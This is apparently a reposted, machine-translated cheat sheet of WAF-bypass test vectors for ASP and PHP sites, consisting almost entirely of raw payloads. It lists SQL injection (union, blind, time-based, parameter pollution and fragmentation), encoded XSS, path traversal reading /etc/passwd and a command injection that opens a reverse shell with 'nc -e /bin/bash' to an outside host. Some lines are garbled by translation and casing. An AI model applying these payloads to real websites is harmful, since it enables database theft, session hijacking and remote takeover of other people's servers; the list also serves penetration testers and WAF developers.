Original http://www.cnblogs.com/r00tgrok/articles/3860093.html
1. Identify vulnerability points
Http://www.site.com.tr/uyg.asp?id=123 ' +union+selec+1,2,3--
Http://www.site.com.tr/uyg.asp?id=123 '
Http://www.site.com.tr/uyg.asp?id=123<12 ("/>
2. HTTP parameter contamination (HPP)
http://www.site.com.tr/uyg.asp?id=123&id=456
Http://www.site.com.tr/uyg.asp?id=123+select+1,2,3+from+table
Http://www.site.com.tr/uyg.asp?id=123+select+1&id=2,3+from+table
Http://www.site.com.tr/uyg.asp?id=select/&id=/user&id=pass/&id=/from/*&id=*/users id=select/*,* /user,pass/*,*/from/*,*/users
3. HTTP parameter Fragmentation (HPF)
Uyg.asp?brandid=123+union/*&prodid=*/select+user,pass/*&price=*/from users--
SELECT * from Table1.markt where brand=123 union/* and prodid=*/select username,pass/*order by*/from users--
4. Encoding
URL Encode-%27
Double URL Encode-%2527
UTF-8 (2 bytes)-%c0%a7
UTF-8 (JAVA)-\uc0a7
HTML Entity-'
HTML Entity number-& #27;
Decimal-& #39
Unicode URL Encoding-%u0027
base64-jw==
Uyg.asp?id=<script>alert (1) </script>
uyg.asp?id=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
uyg.asp?id=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573% 2563%2572%2569%2570%2574%253e
Uyg.asp?id=%3cscript%3ealert (1)%3c%2fscript%3c
Uyg.asp?id=%3cscript%3ealert (1)%3c/script%3c
uyg.asp?id=%3cscript%3ealert%281%29%3c%2fscript%3c
Uyg.asp?id=%%3c%2fscript%3e%3cscript%3ealert (1)%3c%2fscript%3e
Uyg.asp?id=%a2%be%bcscript%bealert (1)%bc/script%be
Uyg.asp?id=<a href= "javas& #99;ript& #35; alert (1);" >
uyg.asp?id=phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg==
uyg.asp?id=data:text/html;base64,phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg==
uyg.asp?id=0;data:text/html;base64,phnjcmlwdd5hbgvydcgwktwvc2nyaxb0pg== "+http-equiv=" Refresh ""
uyg.asp?id=123 or ' 1 ' = ' 1
uyg.asp?id=123%20or%20%271%27=%271
Uyg.asp?id=123%20or%20%c0%a7%c01%a71=%c0%a71
Uyg.asp?id=123%2527%2520select%2520convert (int,@ @servername)--
uyg.asp?id=123k29ykycxjz0nmq==
UYG.ASP?ID=123;NC-E/bin/bash 192.168.1.3 12345;
Uyg.asp?id=%61%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%31%2e%33%20%31%32%33 %34%35%3b
5. Script tag
uyg.asp?id= "+onmouseover=" window.location= ' http://www.site.com.tr/ Code.js '
uyg.asp?id= ' +style%3d ' x%3aexpression (alert (1) +
uyg.asp?id= "+onkeypress=" alert (+)
uyg.asp?id=123); alert (document.cookie);//
Uyg.asp?id=javascript:alert (1)
Uyg.asp?id=alert (document.cookie)
Uyg.asp?id =alert (document[' cookie ')
Uyg.asp?id=with (document) alert (cookie)
uyg.asp?id= "; location=location.hash)// #0 ={};alert (0)
uyg.asp?id=//"; Alert (String.fromCharCode (88,83,83))
Uyg.asp?id=%f6%3cimg+onmouseover= Prompt (/test/)//%f6%3e
uyg.asp?id=% '});%0 Aalert (1);%20//
uyg.asp?id=% "; eval (unescape (location))//#%0aalert (0)
Uyg.asp?id=0;url=javascript:alert (1 "http-equiv=" Refresh ""
uyg.asp?id=onerror= "Javascript:decipher (document.forms.cipher); alert ( Document.forms.cipher.stream.value); Document.forms.cipher.stream.value = Document.forms.cipher.stream_copy.value;
Uyg.php?id=<script>string.fromcharcode (</script>)
Uyg.php?id=10+union+select+load_file (0x2f6574632f706173737764)
Uyg.asp?id=if (substring (USER (), 1,4) =0x726f6f74,sleep (5), 1)
6. Cross-site Scripting
Uyg.asp?id=
Uyg.asp?id=<object data= "Javascript:alert (1)" >
Uyg.asp?id=<object><param name= "src" value= "Javascript:alert (1)" ></param></object>
Uyg.asp?id=<isindex type=image src=1 Onerror=alert (1) >
Uyg.asp?id=<isindex Action=javascript:alert (1) type=image>
Uyg.asp?id=
Uyg.asp?id=<meta style= "xss:expression (Open (Alert (1)))/>
Uyg.asp?id=<!</textarea <body onload= ' alert (1) ' >
uyg.asp?id=</style=?=-=expression\28write (12345) \29>
Uyg.asp?id=<script>document.write (1) </script>
Uyg.asp?id=
Uyg.asp?id=<script<{alert (1)}/></script>
Uyg.asp?id= ">alert (String.fromCharCode (88,83,83));
Uyg.asp?id=</xss/*-*/style=xss:e/**/xpression (Alert (1)) >
Uyg.asp?id=<//style=x:e/**/xpression (Alert (' XSS ')) >
Uyg.asp?id=<object+data= "data:text/html;base64,phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg==" ></object>
7. Blind Injection
Uyg.asp?id=1+and+ascii (Lower (substring (select+pwd+from+users+limit+1,1), 1, 1)) =74--
Uyg.asp?id=1+and+ascii (Lower (Mid ((select+pwd+from+users+limit+1,1), 1, 1)) =74--
Uyg.asp?id=1+and+ascii (' a ') =97
Uyg.asp?id=1+and+hex (' a ') =61
Uyg.asp?id=ord (' a ') = 97
Uyg.asp?id=if (substring (USER (), 1,4) = ' root ', BENCHMARK (100000000,rand ()), 1)--
Uyg.asp?id=if (substring (USER (), 1,4) = ' root ', SLEEP (5), 1)--
Uyg.asp?id=123 ' and (select pass from users limit 1) = ' pass--
8. Other injections
Uyg.asp?id=123+and+1=1
Uyg.asp?id=123+&&+1=1
Uyg.asp?id= ' = '
UYG.ASP?ID=123+AND+MD5 (' a ')! = MD5 (' a ')
Uyg.asp?id=123+and+len (@ @version) >1
Uyg.asp?id=1 ' | | 1= ' 1
uyg.asp?id=123 ' +like+ ' 123
uyg.asp?id=123 ' +not+like+ ' 1234
Uyg.asp?id= ' aaa ' <> ' BBB '
Uyg.asp?id=123+1-1 (id=123)
Uyg.asp?id=123+1 (id=124)
Uyg.asp?id=123+len (1234)-len (123) (id=124)
Uyg.asp?id=123+len (@ @server)-len (@ @server)
uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1/*union*/union/*select*/select+1,2,3/*
uyg.php?id=1%2520union%2520select%25201,2,3/*
uyg.php?id=1%0aunion%0aselect%0a1,2,3/*
uyg.php?id=1/**/union%a0select/**/1,pass,3 ' A ' from ' users '
Uyg.php?id= (0) union (SELECT (TABLE_SCHEMA), TABLE_NAME, (0) from (information_schema.tables) have ((Table_schema) Like (0x74657374) && (table_name)! = (0x7573657273))) #
Uyg.php?id=union (select (version ()))--
uyg.php?id=123/*! UNION ALL Select version () */--
Uyg.php?id=123/*!or*/1=1;
uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1+union+select+1,2,3--
uyg.php?id=1+union+select+1,2,3#
uyg.php?id=1+union+select+1,2,3;%0 0
Uyg.php?id=%3cscript%3ealert (Document.cookie)%3c/script%00testtest%3e
Uyg.php?id=%3cscript%3ealert (Document.cookie)%3c/script%20testtest%3e
Uyg.php?id= "; eval (unescape (location))//#%0aalert (0)
Uyg.php?file=. /.. /.. /.. /.. /etc/passwd/////[...] /////
Uyg.php?file=. /.. /.. /.. /.. /etc/passwd//////////////
Uyg.php?file=.//././/././/./boot.ini uyg.php?id%00testtest=1+union+select+1,2,3
uyg.php?id%20testtest=1+union+select+1,2,3
uyg.php?id=1234& "><script>alert (1) </script>=1234
Uyg.php?id=%00><script>alert (123) </script>
9. URL Rewriting
http://localhost/uyg/id/123+or+1=1/tp/456
"Go" SQL injection and XSS bypass WAF test vectors